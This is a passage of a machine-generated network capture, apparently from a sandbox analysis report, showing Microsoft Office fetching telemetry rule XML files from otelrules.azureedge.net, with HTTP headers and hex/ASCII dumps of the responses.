                                                                                2024-10-04 09:34:16 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                137192.168.2.55560113.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:16 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:16 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:16 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1370
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                ETag: "0x8DC582BDE62E0AB"
                                                                                x-ms-request-id: be019a9f-401e-0035-518c-1582d8000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093416Z-15767c5fc55whfstvfw43u8fp40000000ceg000000006a5k
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:16 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                138192.168.2.55560313.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:16 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:16 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:16 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1360
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                ETag: "0x8DC582BEDC8193E"
                                                                                x-ms-request-id: e360128a-801e-0083-498c-15f0ae000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093416Z-15767c5fc55dtdv4d4saq7t47n0000000c6g000000001vfu
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:16 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                139192.168.2.55560413.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:16 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:16 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:16 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1406
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                ETag: "0x8DC582BEB16F27E"
                                                                                x-ms-request-id: 4b0a4db7-c01e-00ad-2d8c-15a2b9000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093416Z-15767c5fc55tsfp92w7yna557w0000000cbg000000005866
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:16 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                140192.168.2.55560513.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:17 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:17 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:17 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1369
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                ETag: "0x8DC582BE32FE1A2"
                                                                                x-ms-request-id: 1cc313a1-e01e-0071-4b8c-1508e7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093417Z-15767c5fc55ncqdn59ub6rndq00000000bx000000000a94e
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:17 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                141192.168.2.55560813.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:17 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:18 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:17 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1414
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                ETag: "0x8DC582BE03B051D"
                                                                                x-ms-request-id: 4b0a4edd-c01e-00ad-438c-15a2b9000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093417Z-15767c5fc55rg5b7sh1vuv8t7n0000000crg000000002fg6
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:18 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                142192.168.2.55561013.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:17 UTC192OUTGET /rules/rule700150v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:18 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:17 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1362
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                ETag: "0x8DC582BE54CA33F"
                                                                                x-ms-request-id: f1c85a61-d01e-007a-188c-15f38c000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093417Z-15767c5fc55kg97hfq5uqyxxaw0000000ca0000000006bzk
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:18 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                143192.168.2.55560913.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:17 UTC192OUTGET /rules/rule700750v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:18 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:17 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1377
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT
                                                                                ETag: "0x8DC582BEAFF0125"
                                                                                x-ms-request-id: 0dcb9a48-e01e-0003-1c8c-150fa8000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093417Z-15767c5fc55ncqdn59ub6rndq00000000bx000000000a94w
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:18 UTC1377INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                144192.168.2.55561113.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:18 UTC192OUTGET /rules/rule700151v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:18 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:18 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1399
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                ETag: "0x8DC582BE0A2434F"
                                                                                x-ms-request-id: 4a218e36-401e-00a3-268c-158b09000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093418Z-15767c5fc55gs96cphvgp5f5vc0000000ca0000000002bxe
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:18 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                145192.168.2.55561313.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:18 UTC192OUTGET /rules/rule703451v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:18 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:18 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1409
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                ETag: "0x8DC582BDFC438CF"
                                                                                x-ms-request-id: eccf31ce-001e-0079-3e8c-1512e8000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093418Z-15767c5fc55rv8zjq9dg0musxg0000000ce0000000001aq9
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:18 UTC1409INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                146192.168.2.55561813.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:18 UTC192OUTGET /rules/rule700901v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:18 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:18 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1408
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                ETag: "0x8DC582BE1038EF2"
                                                                                x-ms-request-id: f40770c2-201e-0000-318c-15a537000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093418Z-15767c5fc55w69c2zvnrz0gmgw0000000ck00000000066t1
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
